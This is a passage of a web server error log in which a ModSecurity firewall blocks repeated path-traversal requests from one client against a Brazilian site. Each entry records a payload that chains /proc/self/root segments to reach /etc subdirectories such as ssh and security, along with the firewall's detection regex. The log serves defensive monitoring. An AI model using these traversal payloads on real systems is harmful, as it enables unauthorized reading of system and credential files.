"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDjwlT9VtDQc7bgUyelgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:16.840388 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.241.46:48456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDkHbQATo66fKoS7w_mgAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:18.009963 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:44330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDkpqj1wV0Si-OkefbaAAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:21.487990 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:44340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDlf9ocpUE4ed4uDzfoQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:22.777894 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.241.46:44350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDlpqj1wV0Si-OkefbaQAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:24.061284 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:44354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDmAlT9VtDQc7bgUyemAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:25.216351 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:44366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDmdSswJuvopo3lOhScAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:26.571158 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.241.46:44382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDmglT9VtDQc7bgUyemQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:27.764275 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:44384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDm7ABkC4fWIHEf8HdkQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:28.884767 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:56938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDnJqj1wV0Si-OkefbagAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:30.152168 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:56946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDnv9ocpUE4ed4uDzfogAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:32.375407 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:56958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDoBXjF1vJNtV6CWrrnQAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:33.680934 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.241.46:56972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDoRXjF1vJNtV6CWrrngAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:34.878722 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:56988] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDopqj1wV0Si-OkefbawAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:36.065359 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:56998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDpHjZBu2q05ozVU9HyQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:37.416027 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:57000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDpY6lpbStxTqkSktgTgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:38.722892 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:41356] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDptSswJuvopo3lOhSfgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:39.880921 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:41360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDp5qj1wV0Si-OkefbbAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:41.181931 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:41376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDqRXjF1vJNtV6CWrrnwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:43.491486 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:41386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDqhXjF1vJNtV6CWrroQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:46.149906 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:41390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDrrABkC4fWIHEf8HdlQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:49.974947 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:35742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgDsf9ocpUE4ed4uDzfqAAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:20:51.100018 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:35752] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 